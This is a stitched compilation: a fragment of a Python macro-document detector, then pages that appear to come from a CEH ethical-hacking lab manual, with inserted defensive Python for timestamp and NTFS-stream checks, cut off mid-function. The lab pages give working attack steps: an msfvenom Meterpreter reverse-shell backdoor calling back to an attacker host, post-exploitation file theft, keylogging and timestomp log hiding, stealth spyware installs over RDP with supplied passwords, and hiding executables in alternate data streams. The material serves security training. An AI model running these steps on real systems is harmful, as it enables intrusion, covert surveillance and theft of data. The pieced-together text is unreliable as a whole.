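        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", document_xml)
        if with_macro:   # OLE compound-file signature followed by filler: a stub, not real VBA
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64)
    return buf.getvalue()


def inspect_office_document(data):
    """Return the macro indicators found in an OOXML file given as bytes."""
    result = {"is_ooxml": False, "vba_parts": [], "macro_content_type": False,
              "macro_enabled_main_part": False, "lure_phrases": [], "verdict": "clean"}
    try:
        z = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result                     # not a zip container, so not OOXML
    with z:
        names = z.namelist()
        if "[Content_Types].xml" not in names:
            return result
        result["is_ooxml"] = True
        # The VBA project is stored as a binary part, normally word/vbaProject.bin.
        result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
        ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
        result["macro_content_type"] = VBA_CONTENT_TYPE in ct
        result["macro_enabled_main_part"] = "macroenabled" in ct.lower()
        # Strip XML tags from every XML part and look for the social-engineering lure.
        text = " ".join(z.read(n).decode("utf-8", "replace") for n in names if n.endswith(".xml"))
        text = re.sub(r"<[^>]+>", " ", text)
        result["lure_phrases"] = [p for p in LURE_PATTERNS if re.search(p, text, re.I)]
    has_macro = (bool(result["vba_parts"]) or result["macro_content_type"]
                 or result["macro_enabled_main_part"])
    if has_macro and result["lure_phrases"]:
        result["verdict"] = "macro document with enable-content lure"
    elif has_macro:
        result["verdict"] = "macro document"
    return result


if __name__ == "__main__":
    for label, armed in (("armed", True), ("clean", False)):
        print(label, inspect_office_document(build_sample(armed)))
```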
Lab Analysis

Analyze and document the results related to the lab exercise.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
Hacking Windows 10 using Metasploit and Post-Exploitation using Meterpreter


Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.


Lab Scenario

Backdoors are malicious files that contain Trojan or other infectious applications that can either halt the current working state of a target machine or even gain partial/complete control over it. Attackers build such backdoors in an attempt to gain remote access to the victim machines. They send these backdoors through email, file-sharing web applications, shared network drives, among others, and entice the users to execute them. Once a user executes such an application, an attacker can gain access to his/her affected machine and perform activities such as keylogging, sensitive data extraction, and so on, which can incur severe damage to the affected user.


Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of this lab include:
= Creating a server and testing the network for attack
= Attacking a network using a sample backdoor and monitoring system activity

Lab Environment

To carry this out, you need:
= Kali Linux running in virtual machine
= Windows 10 running in virtual machine (Victim machine)
= A web browser with Internet access
= Administrative privileges to run tools

Lab Duration

Time: 20 Minutes
Overview of the Lab

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.


Lab Tasks

Note: Make sure to disable Windows SmartScreen and Windows Defender in Windows 10.

1. Before beginning this lab, create a text file named secret.txt on the Windows 10 virtual machine; write something in it, and save it in the location C:\Users\Admin\Downloads.
2. In this lab, the secret.txt file contains the text "My credit card account number is 123456789."

FIGURE 8.1: The secret.txt file on the Windows 10 machine

3. Log in to Kali Linux virtual machine.
4. Launch a command line terminal.

Task: Create Backdoor.exe File
5. Type the command msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe and press Enter.

FIGURE 8.2: Creating the payload

6. This creates a backdoor on the Desktop.

FIGURE 8.3: Backdoor created

7. Now you need to share Backdoor.exe with the victim machine (in this lab, Windows 10 is the victim machine).
8. To share the file, you need to start the apache server. Type the command service apache2 start in Terminal, and press Enter.

FIGURE 8.4: Starting the apache server

9. Now that the apache web server is running, copy Backdoor.exe into the share folder.
10. Type cp /root/Desktop/Backdoor.exe /var/www/html/share/ and press Enter.

FIGURE 8.5: Copying the backdoor file

11. Now, type the command msfconsole and press Enter to launch msfconsole.
12. Type use exploit/multi/handler and press Enter, to handle exploits launched outside the framework.

FIGURE 8.6: Exploiting the victim machine
13. Now, issue the following commands in msfconsole:
a) Type set payload windows/meterpreter/reverse_tcp and press Enter.
b) Type set LHOST 10.10.10.11 and press Enter.
c) Type show options and press Enter. This lets you know the listening port.
14. To start the handler, type exploit -j -z and press Enter.

FIGURE 8.7: Exploiting the Windows 10 machine
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15. Log on to the Windows 10 virtual machine. 


16, Launch Firefox or any web browses, and type http:/10.10.10.11/share/ 
in the URL fidd, then press Enter. 


Note: 10.10.10.11 is the IP address of Kali Linux, which may vary in your lab environment.


17. Click the Backdoor.exe link to download the backdoor file.


FIGURE 8.9: Firefox web browser with Backdoor.exe
18. The Opening Backdoor.exe pop-up appears; click Save File. 


Note: Make sure both the Backdoor.exe and secret.txt files are in the same directory.


FIGURE 8.10: Saving the Backdoor.exe file


19. By default, this file is stored in C:\Users\Admin\Downloads.

20. On completion of the download, a download notification appears in the browser. Click Open Containing Folder.


FIGURE 8.11: Saving the Backdoor.exe file
21. Double-click Backdoor.exe. If an Open File - Security Warning 
appears, click Run. 


22. Switch back to the Kali Linux machine. A Meterpreter session has been successfully opened, as shown in the following screenshot:


FIGURE 8.12
23. ... and press Enter to view the active sessions.


FIGURE 8.13


24. Type sessions -i 1 and press Enter (1 in the sessions -i 1 command is the id number of the session). The Meterpreter shell is launched, as shown in the following screenshot:


25. Type sysinfo and press Enter. Issuing this command displays target machine information such as computer name, operating system, and so on.


FIGURE 8.15: Viewing system info


26. Type ipconfig and press Enter. This displays the victim machine's IP 
address, MAC address, and so on. 


FIGURE 8.16: IP address related information
27. Type getuid and press Enter.


28. Running getuid shows the attacker that the Meterpreter server is running as administrator on the host.


FIGURE 8.17: Viewing the server username


29. Type pwd and press Enter to view the current working directory on the remote (target) machine.


Note: The current working directory will differ according to where you have saved the Backdoor.exe file; therefore the screenshots might differ in your lab environment.

FIGURE 8.18: Viewing the present working directory (pwd)

30. Type ls and press Enter to list the files in the current working directory.
Note: The screenshots might differ in your lab environment.
31. To read the contents of a text file, type cat filename.txt (here, secret.txt) and press Enter.

FIGURE 8.20
TASK 6: View the MACE Attributes

32. Change the MACE attributes of secret.exe.

33. While performing post-exploitation activities, a hacker tries to access files to read their contents. Upon doing so, the MACE attributes change immediately, which gives the file user/owner an indication that someone has read or modified the information.

34. To leave no hint in these MACE attributes, use the timestomp command to change the attributes as you wish after accessing the file.


35. To view the MACE attributes of secret.txt, type timestomp secret.txt -v and press Enter. This displays the created time, accessed time, modified time, and entry modified time, as shown in the screenshot:


FIGURE 8.21: Viewing the timestomp information
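Steps 33 and 34 describe the two sides of this for a defender: a read moves the A value, and timestomp hides that only if the new values look natural. The added Python example below (not code from the lab manual or from Metasploit) compares a file's M/A/C values against a stored baseline and flags timestamps that look hand-set; SECRET, NOTES and BASELINE are constructed sample data, and snapshot() is the one function that reads a real file.

```python
"""Defender-side check for the MACE timestamps that the timestomp step
rewrites.  Added example, not code from the lab manual or from Metasploit.
SECRET, NOTES, BASELINE and the after_*() scenarios are constructed sample
data; snapshot() is the only part that touches a real file system."""
from dataclasses import dataclass
from datetime import datetime, timezone
import os

UTC = timezone.utc
FIELDS = ("modified", "accessed", "created")


@dataclass(frozen=True)
class Mace:
    """The MACE values os.stat exposes.  E (MFT entry modified) is not
    available through os.stat, so this check works on M, A and C only."""
    modified: datetime
    accessed: datetime
    created: datetime


def snapshot(path: str) -> Mace:
    """Read M, A, C for one file; st_birthtime where the platform has it,
    otherwise st_ctime (which is the creation time on Windows)."""
    st = os.stat(path)
    created_ts = getattr(st, "st_birthtime", st.st_ctime)
    return Mace(datetime.fromtimestamp(st.st_mtime, UTC),
                datetime.fromtimestamp(st.st_atime, UTC),
                datetime.fromtimestamp(created_ts, UTC))


def anomalies(m: Mace) -> list:
    """Heuristics for timestamps set by hand rather than by file activity.
    Each is a weak signal on its own; report them together."""
    found = []
    # timestomp's -z option takes a time with whole-second granularity, so
    # hand-set values tend to carry a zero sub-second fraction, while real
    # activity on NTFS (100 ns resolution) almost never lands on .000000.
    zero = [f for f in FIELDS if getattr(m, f).microsecond == 0]
    if zero:
        found.append("zero sub-second fraction on " + ", ".join(zero))
    # Modified-before-created also happens for a copied file (copying resets
    # C but keeps M), so flag it without treating it as proof.
    if m.modified < m.created:
        found.append("modified earlier than created")
    if m.accessed < m.created:
        found.append("accessed earlier than created")
    return found


def changed(baseline: dict, current: dict) -> dict:
    """Compare two {path: Mace} snapshots.  For each file that differs, report
    which of M/A/C moved (the cat of step 31 shows up as 'accessed') and any
    anomalies in the new values (the timestomp of step 34 shows up here)."""
    report = {}
    for path, before in baseline.items():
        after = current.get(path)
        if after is None:
            report[path] = {"fields": ["missing"], "anomalies": []}
            continue
        moved = [f for f in FIELDS if getattr(before, f) != getattr(after, f)]
        if moved:
            report[path] = {"fields": moved, "anomalies": anomalies(after)}
    return report


# ---- constructed sample data, not real files ---------------------------
def _t(s: str, us: int = 0) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S").replace(microsecond=us,
                                                             tzinfo=UTC)


SECRET = r"C:\Users\Admin\Downloads\secret.txt"   # the file the lab reads
NOTES = r"C:\Users\Admin\Downloads\notes.txt"     # an untouched neighbour
BASELINE = {
    SECRET: Mace(*[_t("2018-03-02 10:15:07", 412389)] * 3),
    NOTES: Mace(*[_t("2018-03-01 09:00:00", 77120)] * 3),
}


def after_read() -> dict:
    """Scenario 1: secret.txt is read (cat); only A advances."""
    now = dict(BASELINE)
    b = BASELINE[SECRET]
    now[SECRET] = Mace(b.modified, _t("2018-03-05 14:02:33", 901332), b.created)
    return changed(BASELINE, now)


def after_stomp() -> dict:
    """Scenario 2: M and A are then pushed back to a round time with
    timestomp; the values changed and they look hand-set."""
    now = dict(BASELINE)
    stomped = _t("2016-01-01 00:00:00")
    now[SECRET] = Mace(stomped, stomped, BASELINE[SECRET].created)
    return changed(BASELINE, now)


if __name__ == "__main__":
    print("after read:", after_read()); print("after stomp:", after_stomp())
```

In a real deployment the baseline would come from snapshot() over the monitored files and be stored off-host, so that the comparison cannot be defeated by editing the baseline along with the file.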


36. The cd command changes the present working directory. As you know, the current working directory is C:\Users\Student\Downloads.


37. Type cd C:\ to change the current remote directory to C:\.

FIGURE 8.22: Changing the path of the directory
38. Now type pwd and press Enter.

39. Observe that the current remote directory has changed to C:\.

FIGURE 8.23: Checking the present working directory
40. Type ls and press Enter to list the files in the current working directory.




41. The download command downloads a file from the remote machine.

42. Type download filename.extension (in this lab, dotnetfx.exe) and press Enter.

FIGURE 8.25: Downloading a file
43. The downloaded file is stored in the Home Folder by default. Click Places, and click Home.


FIGURE 8.26: Browsing the Home Folder


44. The downloaded file is available in the home folder, as shown in the following screenshot:


FIGURE 8.27: Downloaded file in the Home directory


45. The search command helps you locate files on the victim machine. The command is capable of searching through the whole system or specific folders.


46. Type search -f "filename.ext" (here pagefile.sys) and press Enter.
47. Type keyscan_start and press Enter. This starts capturing all keyboard input from the victim system.

FIGURE 8.28: Capturing keyboard input
48. Switch back to the Windows 10 machine, create a text file, and start typing something.
49. Switch to the Kali Linux machine. Type keyscan_dump and press Enter. This dumps all the keystrokes.
50. Type idletime and press Enter.

51. Issuing this command displays the number of seconds for which the user has been idle on the remote system.

FIGURE 8.32: Viewing the idle time

52. You may shut down the victim machine after performing post exploitation.
53. Type shutdown and press Enter. This shuts down the victim machine.


FIGURE 8.33: Victim machine successfully shut down


Lab Analysis 


Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Internet Connection Required
Yes / No

Platform Supported
Classroom / iLabs
User System Monitoring and Surveillance using Spytech SpyAgent


Spytech SpyAgent is a powerful computer spy software that allows you to monitor everything users do on a computer, in total stealth. SpyAgent provides a large array of essential computer monitoring features, as well as website, application, and chat-client blocking, lockdown scheduling, and remote delivery of logs via email or FTP.
Lab Scenario

Today, employees are given access to a wide array of electronic communication equipment. Email, instant messaging, global positioning systems, telephone systems, and video cameras have given employers new ways to monitor the conduct and performance of their employees. Many employees are provided with a laptop computer and mobile phone they can take home and use for business outside the workplace. Whether an employee can reasonably expect privacy when using such company-supplied equipment depends, in large part, on the security policy the employer has put in place and made known to employees.

In this lab, we explain the process of monitoring employee activities using Spytech SpyAgent.


Lab Objectives


The objective of this lab is to help students use Spytech SpyAgent. After completing this lab, students will be able to:


- Install and configure Spytech SpyAgent in a victim machine
- Monitor keystrokes typed, websites visited, and Internet Traffic Data




Lab Environment
To perform this lab, you need:
- A computer running Windows Server 2016
- Run this tool in Windows Server 2012 (victim machine)
- Or, download Spytech SpyAgent at https://www.spytech-web.com/spyagent.shtml
- If you wish to download the latest version, screenshots may differ
- Administrative privileges to install and run tools


Lab Duration
Time: 15 Minutes


Overview of the Lab


This lab demonstrates to students how to establish a remote desktop connection with a victim machine and run a spying application named SpyAgent to secretly track user activities.


1. This lab works only if the target machine is turned ON.

2. Since you have seen how to escalate privileges in the earlier lab (Escalating Privileges by Exploiting Client Side Vulnerabilities), you will use the same technique to escalate privileges and then dump the password hashes.

3. On obtaining the hashes, you will use a password cracking application such as RainbowCrack to obtain plain-text passwords.

4. Once you have the passwords handy, you will establish a Remote Desktop Connection as an attacker, install Spytech SpyAgent, and leave it in stealth mode.

Note: In this lab, you are connecting remotely to a Windows Server 2012 virtual machine. You can establish a remote connection only for a user account that has administrative privileges (here, the Jason user account has administrative privileges, so we shall be logging in to it).

5. The next task would be to log on to the virtual machine as a legitimate user (here, you) and perform user activities without being aware of the application tracking your activities in the background.

6. Once done, you will again establish a Remote Desktop Connection as an attacker, bring the application out of stealth mode, and monitor the activities performed on the virtual machine by the victim (you).
Lab Tasks


TASK 1: Establish a Remote Desktop Connection

1. Log in to the Windows Server 2016 machine and click the Search icon from the taskbar.

FIGURE 9.1: Selecting Search

2. In the Search field, search for Remote Desktop Connection.
3. Click Remote Desktop Connection in the Search results.

FIGURE 9.2: Searching for Remote Desktop Connection
4. The Remote Desktop Connection window opens. Enter the IP address of Windows Server 2012 (in this lab, 10.10.10.12, which might differ in your lab environment) in the Computer field, and click Show Options.


FIGURE 9.3: Launching Remote Desktop Connection
5. Enter a username granted administrative privileges (here, Jason), and click Connect.

FIGURE 9.4
6. The host machine tries to establish a Remote connection with the target machine.


7. A Windows Security pop-up appears; enter the password (qwerty) and click OK.


FIGURE 9.5: Windows Security pop-up
8. A Remote Desktop Connection window appears; click Yes.


FIGURE 9.6
Note: You cannot access a Remote Desktop Connection if the target machine is shut down. Remote Desktop Connection is possible only if the machine is turned ON.

9. A Remote Desktop connection is successfully established, as shown in the screenshot:




10. Close the Server Manager window.


TASK 2: Install Spytech SpyAgent

11. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Spyware\General Spyware\Spytech SpyAgent and double-click Setup (password=spytech).exe.
12. If the Cannot access network resource dialog box appears, enter the credentials of the Windows Server 2016 machine, and click OK.


FIGURE 9.9


13. The Spytech SpyAgent Setup window appears; click Next.

FIGURE 9.10: Spytech SpyAgent Setup window
14. The Welcome wizard of the Spytech SpyAgent Setup program window appears; read the instructions and click Next.


FIGURE 9.11: Welcome wizard
15. The Important Notes wizard appears; read the note and click Next.


FIGURE 9.12: Important Notes wizard
16. The Software License Agreement window appears; you need to accept the agreement to install Spytech SpyAgent.
17. So, click Yes to continue.


18. The Choose Destination Location window appears; verify the directory to install Spytech SpyAgent.


19. Click Next to continue installation. 


FIGURE 9.14: Choosing the destination location
20. The Select SpyAgent Installation Type window appears; select the Administrator/Tester setup type.


21. Click Next.


FIGURE 9.15: Selecting Installation Type
22. The Ready to Install window appears; click Next to start installing Spytech SpyAgent.

FIGURE 9.16: Ready to Install window
23. The Spytech SpyAgent Setup dialog box prompts you to include an uninstaller; click Yes.


FIGURE 9.17: Selecting an uninstaller


24. A Spytech SpyAgent window appears; close the window.


FIGURE 9.18: Spytech SpyAgent window
25. The A NOTICE FOR ANTIVIRUS USERS window appears; read the notice, and click Next.


FIGURE 9.19: A Notice For Antivirus Users window


26. The Finished window appears; uncheck View Help Documentation, and click Close to end the setup.


FIGURE 9.20: Finished window
27. The Spytech SpyAgent dialog box appears; click Continue...


FIGURE 9.21: Spytech SpyAgent dialog box

28. Step 1 of the setup wizard appears; click click to continue...


FIGURE 9.22: Step 1 of setup wizard


29. Enter a password in the New Password field, and retype the same password in the Confirm field.
Note: Here, the password entered is qwerty@123
30. Click OK.


FIGURE 9.23: Setting New Password

31. The password changed pop-up appears; click OK.


FIGURE 9.24: Password changed pop-up

32. Step 2 of the Welcome wizard appears; click click to continue...


FIGURE 9.25: Step 2 of Welcome wizard
33. The Configuration section of the setup wizard appears; click the Complete + Stealth Configuration radio button, and click Next.


FIGURE 9.26: Configuration section

34. The Extras section of the setup wizard appears; check the Load on Windows Startup option, and click Next.

FIGURE 9.27: Extras section
35. The Confirm Settings section of the setup wizard appears; click Next to


FIGURE 9.28: Confirm Settings section


36. The Apply section of the setup wizard appears; click Next.


FIGURE 9.29: Apply section
37. The Finished window appears; click Finish to successfully set up SpyAgent.


FIGURE 9.30: Configuration Finished

38. The main window of SpyAgent appears, along with Step 3 of the setup wizard.
39. Click click to continue...

FIGURE 9.31: Main window of SpyAgent
40. If a Getting Started dialog box appears, click No.
41. To track the general user activities, click Start Monitoring.


FIGURE 9.32: Start monitoring

42. The Enter Access Password window appears; enter the password you specified in step 31 (in this lab, qwerty@123), and click OK.


FIGURE 9.33: Entering the password

43. The Stealth Notice window appears; read the instructions, and click OK.
Note: To bring SpyAgent out of stealth mode, press Ctrl+Shift+Alt+M.


44. A SpyAgent pop-up appears. Check Do not show this Help Tip again and Do not show Related Help Tips like this again; click click to continue...


FIGURE 9.35: Start monitoring

45. Close the Remote Desktop Connection.

TASK 3: Log on as a Legitimate User and Perform User Activities

46. Now log on to the Windows Server 2012 virtual machine's Jason account as a legitimate user (assume you are acting as a victim).
47. Browse the Internet (anything), or perform any user activity.


FIGURE 9.36: Perform User Activities

48. Now, switch back to the host machine, and perform steps 1-8 to launch Remote Desktop Connection (you are logging into the machine as an attacker).

FIGURE 9.37: Establishing Remote Desktop Connection

49. To bring SpyAgent out of stealth mode, press Ctrl+Shift+Alt+M.

50. SpyAgent will ask for an Access Password (qwerty@123); enter it and click OK.


FIGURE 9.38: Entering the password

51. To check user keystrokes from the keyboard, click Keyboard & Mouse on the SpyAgent GUI.


52. Select View Keystrokes Log. 


FIGURE 9.39: Selecting View Keystrokes Log


53. A list of keystrokes log entries is displayed. Select an application whose log entries you want to view. Here, bank account details have been viewed.


Note: If a User Account Control pop-up appears asking you to disable the UAC, click Yes.


54. SpyAgent displays all the resultant keystrokes for the selected application, as shown in the screenshot:


FIGURE 9.40
55. To check the websites visited by the user, click Website Usage.
56. Select View Websites Logged.


FIGURE 9.41: Selecting View Websites Logged


57. SpyAgent displays all the user-visited website results, as shown in the 
screenshot: 


FIGURE 9.42
58. In the same way, you can select each tile to view all the activities.
59. Once you are finished, close the Remote Desktop Connection.

60. This way, even an attacker can hack into a machine and install SpyAgent to spy on all activities performed by a user on his/her system.


Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion regarding your target's security posture and exposure.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Web Activity Monitoring and Recording using Power Spy

Power Spy software allows you to secretly monitor and record all activities on your computer, which is completely legal.

Lab Scenario

New technologies allow employers to check whether employees are wasting time at recreational Web sites or sending unprofessional emails. At the same time, organizations should be aware of local laws so that their legitimate business interests do not become an unacceptable invasion of worker privacy. Before deploying an employee monitoring program, you should clarify the terms of acceptable and unacceptable use of corporate resources during work hours, and develop a comprehensive acceptable use policy (AUP) that staff must agree to.

In this lab, we explain monitoring employee activities using Power Spy.


Lab Objectives
The objective of this lab is to help students use the Activity Monitor tool. After completing this lab, students will be able to:

- Install and configure Power Spy
- Monitor keystrokes typed, websites visited, and Internet Traffic Data


Lab Environment
To perform the lab, you need:
- A computer running Windows Server 2016
- A computer running Windows Server 2012 virtual machine (victim machine)
- You can download the Power Spy tool from http://www.ematrixsoft.com/download.php?p=power-spy-software
- If you wish to download the latest version, screenshots may differ
- Administrative privileges to install and run tools
Lab Duration
Time: 15 Minutes
Overview of the Lab

This lab demonstrates to students how to establish a remote desktop connection with a victim machine and run Power Spy to secretly track user activities.

1. This lab works only if the target machine is turned ON.

2. As you have seen how to escalate privileges in the earlier lab (Escalating Privileges by Exploiting Client Side Vulnerabilities), you will use the same technique to escalate privileges and then dump the password hashes.

3. On obtaining the hashes, you will use a password cracking application such as RainbowCrack to obtain plain text passwords.

4. Once you have the passwords handy, you will establish a Remote Desktop Connection as an attacker; install Power Spy, and leave it in stealth mode.

Note: In this lab, you are connecting remotely to a Windows Server 2012 virtual machine. You can establish a remote connection only for a user account granted administrative privileges (here, Jason has administrative privileges).

5. The next task will be to log onto the virtual machine as a legitimate user (in this case, you) and perform user activities without being aware of the application tracking your activities.

6. Having done so, you will again establish a Remote Desktop Connection as an attacker, bring the application out of stealth mode, and monitor the activities performed on the virtual machine by the victim (you).


Lab Tasks

1. In the Windows Server 2016 machine, click the Search icon in the taskbar to open the search menu.

FIGURE 10.1: Selecting Search
2. Here, search for Remote Desktop Connection.
3. Click Remote Desktop Connection in the Search field.

FIGURE 10.2: Searching for Remote Desktop Connection

4. The Remote Desktop Connection window appears; enter the IP address of 
Windows Server 2012 (in this lab, 10.10.10.12, which might differ in your 
lab environment) in the Computer field, and click Show Options. 


FIGURE 10.3
FIGURE 10.4

6. The host machine tries to establish a Remote connection with the target machine.
7. A Windows Security pop-up appears; enter the password (qwerty) and click OK.
FIGURE 10.5: Windows Security pop-up
8. A Remote Desktop Connection window appears; click Yes.




Note: You cannot access a Remote Desktop Connection if the target machine is shut down. This is possible only if the machine is turned on.


9. A Remote Desktop connection is successfully established, as shown in the screenshot:

FIGURE 10.7: Remote Desktop Connection established successfully
10. Close the Server Manager window.

TASK 2: Install Power Spy

11. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Spyware\General Spyware\Power Spy.
12. Double-click setup.exe.
13. If the Open File - Security Warning pop-up appears, click Run.
14. Follow the installation steps to install Power Spy.

15. On completing the installation, the Run as Administrator window appears; click Run.

FIGURE 10.8: Run as administrator window


16. The Setup Login Password window appears; enter the password (qwerty@123) in the New password and Confirm password fields.

17. Click Submit.

FIGURE 10.9: Setup login password window
18. The Welcome To Power Spy Control Panel! webpage appears in the default browser. Close the browser.

FIGURE 10.10: Welcome To Power Spy Control Panel webpage
19. If the Microsoft Phishing Filter pop-up appears, select Ask me later and click OK.

FIGURE 10.11: Microsoft Phishing Filter pop-up
20. The Information dialog box appears on the Setup login password window; click OK.

FIGURE 10.12: Information dialog box


21. The Enter login password window appears; enter the password (which

FIGURE 10.13: Enter login password window
23. The Register product window appears; click on Later to continue.

FIGURE 10.14: Register product window


24. The main window of Power Spy opens as shown below.

FIGURE 10.15: Main window of Power Spy
25. Click on Start Monitoring.

FIGURE 10.16: Start monitoring

26. If the System Reboot Recommended window appears, click OK.

27. Click on Stealth Mode (stealth mode runs Power Spy completely
invisibly on the computer).

28. The Hotkey reminder dialog box appears; click OK (to unhide Power Spy,
press Ctrl+Alt+X together on your PC keyboard).

FIGURE 10.17: Hotkey reminder dialog box
29. The Confirm dialog box appears; click Yes.

FIGURE 10.18: Confirm dialog box


30. Close the Remote Desktop Connection. 


31. Log on to the Windows Server 2012 virtual machine's Jason account as
a legitimate user (here, assume you are acting as a victim).

32. Browse the Internet (anything) or perform any user activity. In this lab,
the Facebook and LinkedIn websites have been browsed.

33. Once you have performed some user activities, follow steps 1-8 to launch
Remote Desktop Connection (you are logging in as an attacker).

34. To bring Power Spy out of stealth mode, press Ctrl+Alt+X.
35. The Run as administrator window appears; click on Run.

FIGURE 10.19: Run as administrator window


36. The Enter login password window appears; enter the password (which
you set in step 16).

37. Click Submit.

FIGURE 10.20: Enter login password window
38. Click Later in the Register product window to continue.

FIGURE 10.21: Click on Later


39. Click on Stop Monitoring to stop the monitoring.

FIGURE 10.22: Stop the monitoring
40. To check user keystrokes from the keyboard, click on Keylogger in the
Power Spy Control Panel.

FIGURE 10.23: Selecting Keylogger from the Power Spy control panel


41. It will display all the resultant keystrokes, as shown in the screenshot.

FIGURE 10.24: Recorded keystrokes
42. To check the websites visited by the user, click on Website Visited in the
Power Spy control panel.

43. It will show all the user-visited websites' results, as shown in the

FIGURE 10.25: Result of websites visited


44. This way, an attacker might attempt to install keyloggers and thereby gain
information related to the websites the user logged in to, keystrokes, and so on.


Lab Analysis
Analyze and document the results related to the lab exercise. Provide your opinion
regarding your target's security posture and exposure.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB


Internet Connection Required
Yes / No
Platform Supported
Classroom / iLabs

CEH Lab Manual  Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.


Hiding Files using NTFS Streams 


A stream consists of data associated with a main file or directory (known as the main
unnamed stream). Each file and directory in NTFS can have multiple data streams
that are generally hidden from the user.
Lab Scenario
Once the hacker has fully hacked the local system, installed their backdoors and
port redirectors, and obtained all the information available to them, they will
proceed to hack other systems on the network. Most often, there are matching
service, administrator, or support accounts residing on each system that make it
easy for the attacker to compromise each system in a short amount of time. As
each new system is hacked, the attacker performs steps to gather additional
system and password information. Attackers continue to leverage information on
each system until they identify passwords for accounts that reside on highly prized
systems including payroll, root domain controllers, and Web servers. To be an
expert ethical hacker and penetration tester, you must understand how to hide
files using NTFS streams.


Lab Objectives
The objective of this lab is to help students learn how to hide files using NTFS
streams.
It will teach you how to:

Tools demonstrated in this lab are available in Z:\CEH-Tools\CEHv10 Module 06 System Hacking

Lab Environment
To carry out the lab you need:
= Windows Server 2016 running as a virtual machine
= NTFS formatted C:\ drive
Lab Duration

Time: 10 Minutes. 

Overview of NTFS Streams

NTFS supersedes the FAT file system as the preferred file system for Microsoft
Windows operating systems. NTFS has several improvements over FAT and HPFS
(High Performance File System), such as improved support for metadata and the use
of advanced data structures.

Lab Tasks
1. Run this lab in the Windows Server 2016 virtual machine.
2. Make sure the C:\ drive file system is of NTFS format. To check this, go
to Computer, right-click C:, and click Properties.

FIGURE 11.1: C:\ drive of Windows Server 2016
3. The Local Disk (C:) Properties window appears; check for the file system
format, and click OK.

FIGURE 11.2: Windows C:\ properties
4. Open Windows Explorer, navigate to the C: drive, create a new folder and
name it magic. Using Windows Explorer, copy calc.exe from
C:\windows\system32 to C:\magic.

FIGURE 11.3: Copy calc.exe
5. Launch the command prompt, type cd C:\magic and press Enter.
The command prompt now points to the C:\magic directory. Now type
notepad readme.txt and press Enter.

6. The readme.txt notepad appears; click the Yes button if prompted to
create a new readme.txt file.

FIGURE 11.4: Creating readme.txt
7. Now type Hello World! in the notepad file.

FIGURE 11.5: Hello World in the readme.txt file


8. Click File, and click Save to save and close the readme.txt notepad file.

FIGURE 11.6: Save the readme.txt notepad file
9. Type dir and press Enter. This lists all the files present in the directory,
along with the files' sizes. Note the file size of readme.txt.

FIGURE 11.7: Note the size of the readme.txt file


10. Now hide calc.exe inside readme.txt by typing the following in the
command prompt:

type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe

Then press Enter.

FIGURE 11.8: Command prompt with the hiding-files command


11. Type dir in the command prompt and note the file size of readme.txt, which
should not change. Navigate to the directory c:\magic, and delete
calc.exe.
12. Type the following command in the command prompt:

mklink backdoor.exe readme.txt:calc.exe

Then press Enter.

In the next line, type backdoor and press Enter. The calculator program
will be executed as shown in the following screenshot.

FIGURE 11.11: Command prompt with the executed hidden calc.exe


13. In real time, attackers may use NTFS streams to hide malicious files from
legitimate users and execute them whenever required.
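As a defender-side check added here (not part of the lab manual), the following Python script lists the alternate data streams that step 10 creates and that a plain dir never shows: it parses the output of `dir /R` (a constructed sample is embedded) and, on Windows, can open a stream by its path:stream name to test for a PE header.

```python
"""Added example (not from the lab manual): find alternate data streams (ADS), the
NTFS hiding place the lab uses to tuck calc.exe inside readme.txt.

Two checks:
  parse_dir_r()   parses the output of `dir /R`, the Windows command that lists a file's
                  named streams as name:stream:$DATA (plain `dir`, as in step 9, never
                  shows them, which is why the readme.txt size looks unchanged);
  looks_like_pe() reports whether a stream's leading bytes are a PE executable.
The `dir /R` output below is constructed for this example; its sizes are illustrative.
"""
import re
import sys
from typing import List, NamedTuple

# A named-stream line in `dir /R` output: leading spaces, size, file:stream:$DATA
#                               27,136 readme.txt:calc.exe:$DATA
_STREAM_LINE = re.compile(r"^\s*(\d[\d,]*)\s+(.+?):([^:\\/]+):\$DATA\s*$")


class AltStream(NamedTuple):
    file: str
    stream: str
    size: int


def parse_dir_r(output: str) -> List[AltStream]:
    """Return every alternate data stream listed in `dir /R` output."""
    found = []
    for line in output.splitlines():
        m = _STREAM_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append(AltStream(m.group(2), m.group(3), size))
    return found


def suspicious_streams(output: str) -> List[AltStream]:
    """Streams worth a closer look: everything except Zone.Identifier, the
    mark-of-the-web stream browsers legitimately attach to downloads."""
    return [s for s in parse_dir_r(output) if s.stream != "Zone.Identifier"]


def looks_like_pe(head: bytes) -> bool:
    """True if the bytes start with the DOS/PE 'MZ' magic, i.e. a Windows executable."""
    return head[:2] == b"MZ"


def stream_looks_like_pe(path: str, stream: str) -> bool:
    """Open path:stream (Python on Windows can open an ADS by that name) and test
    its header.  Only meaningful on NTFS; elsewhere ':' is an ordinary filename char."""
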